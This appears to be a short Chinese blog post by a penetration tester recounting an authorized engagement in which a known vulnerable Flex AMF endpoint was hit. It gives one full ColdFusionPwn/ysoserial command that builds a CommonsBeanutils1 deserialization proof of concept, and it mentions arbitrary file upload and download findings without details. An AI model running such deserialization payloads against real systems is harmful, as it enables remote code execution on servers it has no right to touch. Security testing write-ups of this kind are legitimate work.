梭哈40分钟


在这里有两个项目,一个是代码审计一个是渗透测试,qax是代码审计,qm是渗透测试,按照客户要求晚上配合qm的做季度渗透,因为审计过的原因知道这个系统引用的组件版本存在漏洞,通过过滤器知道flex作用于messagebroker/*

1
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.8-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 "sleep-check-20"  poc.amf


生成一个休眠20秒的poc直接打过去

根据以往的审计报告
再顺手捡个任意文件上传

任意文件下载


本来是要求渗透到第二天七点的,但是都这样了我怎么可能允许自己再通宵,下班,让qm的继续去透吧


声明:
本文章用于学习交流,严禁用于非法操作,出现后果一切自行承担,阅读此文章表示你已同意本声明。

Disclaimer:
This article is for study and communication. It is strictly forbidden to use it for illegal operations. All consequences shall be borne by yourself. Reading this article means that you have agreed to this statement.